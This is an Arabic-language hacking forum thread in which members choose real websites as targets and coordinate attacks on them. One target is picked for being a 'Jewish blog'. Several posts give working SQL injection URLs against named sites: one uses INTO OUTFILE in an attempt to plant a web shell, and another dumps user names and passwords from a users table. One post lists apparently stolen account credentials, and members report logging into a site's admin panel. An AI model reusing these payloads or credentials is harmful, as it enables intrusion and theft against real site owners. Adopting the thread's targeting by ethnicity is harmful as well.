|
اقتباس:
معاك حق فعلا هما يحبون الشي يجيهم جاهز وكامل... ضع الهدف وتوكل وراح نترك الهدف لبكرا ممكن احد الاعضاء يشارك معانا ويحقنو تحياتي^_^ [/align] |
هذا هو الهدف الجديد blog يهودي مع العلم أنني أريد خطوات الإختراق كل أمر قمت به و العقبات التي صادفتك كود: http://blog.soundcat.org/post.php?id=12 |
Master vbspiders صدقني ماراح يحقنو ولا واحد ولو تتركه أسبوع كامل |
اقتباس:
لانو فيه تخمين ننتظر لبكرا والله كريم تحياتي[/align] |
اليكم هذا الموقع http://www.slatina-online.ro/adauga_...ue&categorie=5 |
جاري أخ marrak |
اقتباس:
يرجى التأكد و الله أعلم |
شوف الموقع بثغرة into outfile تقدر ترفع شيل لازم مسار مصرح http://www.talkeetnachamber.org/news...,7,8,9,10,11-- و يتيح الطباعة قمت بتكوين ملف في مجلد tmp http://www.talkeetnachamber.org/news.php?id=158+AND+1=2+UNION+SELECT+1,2,3,'d4rk-h4ck3r',5,6,7,8,9,10,11+into+outfile"/tmp/d4rk.txt" http://www.talkeetnachamber.org/news...,7,8,9,10,11-- لول تمت طباعة اسمي يعني يتيح الطباعة فقط ما زال معرفة مسارنا بالسيرفر اذا وجدناه اضمنلك شل مرفوع |
d4rK-h4ck3r هههههههههههههههههههههه مازال ماوصلتش لهاذ الدرجة من الإحتراف أخي الكريم ههههههههههههههههههههههههههههههههههههههههههههههه |
اخي هذه الفائدة من المشاركات مزيد التعلم و ان شاء الله تتقن مثل هذا النوع من الثغرات كما ان الاخوة من الجزائر سريعوا التعلم و هم النخبة في الاختراق اولهم الاسطورة his0k4 و ان شاء الله تتوصل لاختراقه العبرة في المحاولة ;) |
تعم أخي العزيز أول مرة أتعلم السيكول في 2 ساعات إخترفت موقع ههههههههههههههههههههههه اليوم فقط رجعت النت قوية أرجو أن تتواصل هكذا لكي أعود إلى التعلم من جديد |
ان شاء الله لما احسن و انا سارفعلك شرح عامله لاستغلال هذا النوع من الثغرات لكن اصبر علي شوي lol |
اقتباس:
there exist some account you can so use it username:password florintele:356746 giba:123 office:456 keepto.ro:12345 . . . regards |
تم الدعس اقتباس:
حياك الله أخي الكريم الموقع مصاب و يكفي تغيير السكريبت. الاستغلال الكامل كود: http://www.slatina-online.ro/detalii_anunt.php?id_anunt=267&id_categ=3&id_subcateg=-22%20union%20select%201,2,concat_ws(0x3a,id,user,parola)+from+utilizatori-- |
[align=center]ممممم بالنسبة للموقع الاول : http://blog.soundcat.org/post.php?id=12 ما قدرت اخمن الجداول للاسف... واما الموقع الثاني تبع الاخ marrak فبالبداية كان تفكيري مثل الاخ ooooo_darkman_ooooo يعني ما في خطا اصلا والموقع مش مصاب لكن بعدها فكرت اجرب بسكربت ثاني وعلى نفس الموقع ونجحت والاخ m0h@med وضع الاستغلال قبلي وهذا هو : كود PHP: والباس هو : 356746 ولوحة الدخول : http://www.slatina-online.ro/ هناك تسجيل دخول واضح بالصفحة الرئسية تم الدخول بنجاح بارك الله فيكم جميعا... عمل منظم ورائع تحياتي [/align] |
| الساعة الآن 06:18 PM |
[ vBspiders.Com Network ]